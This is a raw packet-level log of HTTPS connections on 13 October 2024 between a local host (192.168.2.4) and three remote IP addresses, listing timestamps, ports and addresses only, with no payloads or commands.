Oct 13, 2024 18:15:16.403279066 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.451819897 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.451831102 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452116013 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.452178955 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452426910 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452434063 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452440977 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452506065 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452631950 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.452631950 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.452735901 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452950001 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.452960968 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.453039885 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.453054905 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.453074932 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.453118086 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.453119993 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.453346014 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.453675985 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:20.650624990 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:20.650710106 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:20.650803089 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:20.654094934 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:20.654136896 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.387917995 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.388142109 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.392668009 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.392699003 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.392944098 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.440664053 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.475351095 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.519412994 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.849539042 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.849554062 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.849723101 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.849724054 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.849741936 CEST	443	49741	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:21.849798918 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.858278036 CEST	49741	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:21.877629042 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:21.877672911 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:21.877743006 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:21.877996922 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:21.878017902 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.450933933 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.451019049 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.453497887 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.453528881 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.453771114 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.461658955 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.507397890 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.600578070 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.602247953 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.602261066 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.602332115 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.602365017 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.602425098 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.893812895 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.893822908 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.893912077 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.893923044 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.893996954 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.894032955 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.894052029 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.894246101 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.894262075 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.894303083 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.894305944 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.894330025 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.894340038 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.894342899 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.894365072 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.894386053 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.899293900 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.899308920 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.899333954 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.899375916 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.899420977 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.899451971 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.901004076 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.901021004 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.901066065 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.901103020 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.901129007 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.902086020 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.902097940 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.902146101 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.902163982 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.902185917 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.904160976 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.904177904 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.904231071 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.904268980 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.906407118 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.906454086 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.906466961 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.906482935 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.906529903 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.907557964 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.907592058 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.907634020 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.907658100 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.907684088 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.909313917 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.909327984 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.909399033 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.909419060 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.910953045 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.910969019 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.911029100 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.911045074 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.911099911 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.912117004 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.912133932 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.912163019 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.912194967 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.912218094 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.912241936 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.913325071 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.913341999 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.913384914 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.913403988 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.913429022 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.963601112 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.963613033 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.963687897 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.963699102 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964134932 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964150906 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964288950 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.964288950 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.964302063 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964673042 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964688063 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964740038 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.964750051 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.964764118 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.965209961 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.965226889 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.965286970 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.965286970 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.965296030 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.965704918 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.965717077 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.965754032 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.965763092 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.965776920 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.966368914 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.966384888 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.966413975 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.966420889 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.966443062 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.966907024 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.966918945 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.966964006 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.966970921 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.966984987 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.967381001 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.967397928 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.967439890 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:22.967458963 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:22.967472076 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.018680096 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306088924 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306119919 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306178093 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306194067 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306265116 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306303024 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306303024 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306552887 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306577921 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306617975 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306641102 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306688070 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306862116 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306931019 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.306934118 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306979895 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.306997061 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.307017088 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.307039022 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.307846069 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.307867050 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.307909012 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.307912111 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.307931900 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.307960987 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.307960987 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.308588028 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.308612108 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.308654070 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.308666945 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.308698893 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309129000 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309178114 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309197903 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309214115 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309245110 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309264898 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309582949 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309604883 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309648991 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309654951 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309668064 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309670925 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309711933 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.309951067 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.309973955 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.310010910 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.310025930 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.310055971 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.310302019 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.310348988 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.310365915 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.310379028 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.310405970 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.310950994 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.311002016 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.311017990 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.311032057 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.311079979 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.311079979 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.311300039 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.311320066 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.311364889 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.311382055 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.311405897 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.311434984 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.311688900 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312155962 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312175989 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312215090 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312227964 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312258005 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312674999 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312721014 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312741041 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312753916 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312791109 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312813997 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312830925 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312849998 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312886000 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312903881 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.312927961 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312948942 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.312958956 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313545942 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313576937 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313613892 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.313627958 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313661098 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.313693047 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313735962 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313755035 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.313767910 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.313802958 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.313802958 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.314315081 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.314337015 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.314377069 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.314385891 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.314400911 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.314402103 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.314445972 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.314944029 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.314971924 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315007925 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.315025091 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315052032 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.315095901 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315141916 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315154076 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.315171003 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315197945 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.315218925 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.315711975 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315733910 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315769911 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.315781116 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.315809011 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.316185951 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.316231012 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.316251040 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.316262960 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.316294909 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.316314936 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.318203926 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.318687916 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.318706989 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.318749905 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.318768978 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.318797112 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.326271057 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.326298952 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.326335907 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.326355934 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.326381922 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.326951027 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.326972008 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327008963 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.327025890 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327054024 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.327511072 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327534914 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327570915 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.327586889 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327615023 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.327876091 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327924013 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327939987 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.327954054 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.327984095 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.328002930 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.328260899 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328282118 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328319073 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.328336954 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328363895 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.328401089 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.328411102 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328767061 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328790903 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328825951 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.328839064 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.328870058 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.369813919 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.369869947 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.370110035 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.370110035 CEST	49743	443	192.168.2.4	54.231.232.1
